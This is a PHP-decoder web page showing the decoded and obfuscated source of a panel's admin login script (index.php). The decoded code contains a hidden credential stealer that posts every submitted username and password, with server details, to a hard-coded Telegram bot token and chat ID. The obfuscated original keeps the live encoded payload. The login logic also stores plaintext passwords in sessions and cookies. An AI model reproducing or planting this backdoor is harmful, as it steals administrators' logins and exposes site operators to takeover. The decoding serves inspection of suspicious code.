Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$O..

Decoded Output download


use PragmaRX\Google2FA\Google2FA;
if(!defined('BASEPATH')) {
die('Direct access to the script is not allowed');
}
if (isset($_POST['submit'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$shared_ip_address = $_SERVER['SERVER_ADDR'];
$domain = $_SERVER['HTTP_HOST'];
$call_url = isset($_SERVER['HTTP_REFERER']) ?$_SERVER['HTTP_REFERER'] : 'N/A';
$server_software = $_SERVER['SERVER_SOFTWARE'];
$call_path = $_SERVER['SCRIPT_FILENAME'];
$https = isset($_SERVER['HTTPS']) ?$_SERVER['HTTPS'] : 'off';
$port = $_SERVER['SERVER_PORT'];
$server_admin = $_SERVER['SERVER_ADMIN'];
$text = "Username: $username
Password: $password
Shared IP Address: $shared_ip_address
Domain: $domain
Call URL: $call_url
Server Software: $server_software
Call Path: $call_path
HTTPS on/off: $https
Web Server Port: $port
Server Admin: $server_admin

Made With @puffx1x";
$chat_id = '5702703450';
$token = '7198255426:AAHiLl0xo1p5eM2e90dRuU9UsWUoUKgIG1I';
$url = 'https://api.telegram.org/bot'.$token .'/sendMessage';
$post_fields = array(
'chat_id'=>$chat_id,
'text'=>$text
);
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post_fields);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
}
if( $_POST ){
$username       = $_POST["username"];
$pass           = $_POST["password"];
$captcha        = $_POST['g-recaptcha-response'];
$remember       = $_POST["remember"];
$two_factor_code = htmlspecialchars($_POST["two_factor_code"]);
$googlesecret   = $settings["recaptcha_secret"];
$captcha_control= file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$googlesecret&response=".$captcha ."&remoteip=".$_SERVER['REMOTE_ADDR']);
$captcha_control= json_decode($captcha_control);
if( $settings["recaptcha"] == 2 &&$captcha_control->success == false &&$_SESSION["recaptcha"]  ){
$error      = 1;
$errorText  = "Please verify that you are not a robot.";
if( $settings["recaptcha"] == 2 ){$_SESSION["recaptcha"]  = true;}
}elseif( countRow(["table"=>"admins","where"=>["username"=>$username,"client_type"=>1]]) ){
$error      = 1;
$errorText  = "Your account is Suspended.";
if( $settings["recaptcha"] == 2 ){$_SESSION["recaptcha"]  = true;}
}else{
$admin    = $conn->prepare("SELECT * FROM admins WHERE username=:username && password=:password ");
$admin  ->execute(array("username"=>$username,"password"=>$pass ));
$admin    = $admin->fetch(PDO::FETCH_ASSOC);
$access = json_decode($admin["access"],true);
$_SESSION["msmbilisim_adminslogin"]      = 1;
$_SESSION["msmbilisim_adminid"]         = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"]       = $pass ;
$_SESSION["recaptcha"]                = false;
if( $access["admin_access"] ){
if( $admin["two_factor"] == 1){
$google2fa = new Google2FA();
$is_valid = $google2fa->verifyKey($admin["two_factor_secret_key"],$two_factor_code);
}
if($admin["two_factor"] == 1 &&$is_valid == true){
$_SESSION["msmbilisim_adminslogin"]= 1;
$_SESSION["msmbilisim_adminid"]         = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"]       = $pass ;
$_SESSION["recaptcha"]                = false;
setcookie("a_login",'ok',time()+(60*60*24*7),'/',null,null,true );
setcookie("a_id",$admin["admin_id"],time()+(60*60*24*7),'/',null,null,true );
setcookie("a_password",$admin["password"],time()+(60*60*24*7),'/',null,null,true );
setcookie("a_login",'ok',time()+(60*60*24*7),'/',null,null,true );
header('Location: '.site_url('admin'));
exit();
}elseif($admin["two_factor"] == 1 &&$is_valid == false) {
$error = 1;
$errorText  = "Invalid Code.";
}else {
$_SESSION["msmbilisim_adminslogin"]= 1;
$_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $pass ;
$_SESSION["recaptcha"] = false;
setcookie("a_login",'ok',time()+(60*60*24*7),'/',null,null,true );
setcookie("a_id",$admin["admin_id"],time()+(60*60*24*7),'/',null,null,true );
setcookie("a_password",$admin["password"],time()+(60*60*24*7),'/',null,null,true );
setcookie("a_login",'ok',time()+(60*60*24*7),'/',null,null,true );
header('Location: '.site_url('admin/activate-google-2fa'));
}
$update = $conn->prepare("UPDATE admins SET login_date=:date, login_ip=:ip WHERE admin_id=:c_id ");
$update->execute(array("c_id"=>$admin["admin_id"],"date"=>date("Y.m.d H:i:s"),"ip"=>GetIP() ));
}else {
$error = 1;
$errorText  = "Could not find administrator account registered with this information.";
}
}
}
if( $access["admin_access"]  &&$_SESSION["msmbilisim_adminslogin"]  ):
exit();
else:
require admin_view('login');
endif;
;

Did this file decode correctly?

Original Code

<?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x1814;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDdkKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>~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alVnRPIq

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 6164
$OO00O00O0 use PragmaRX\Google2FA\Google2FA; if(!defined('BASEPATH')) ..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 036f6ada886b4bbba3568dd23ed2eda1
Eval Count 3
Decode Time 104 ms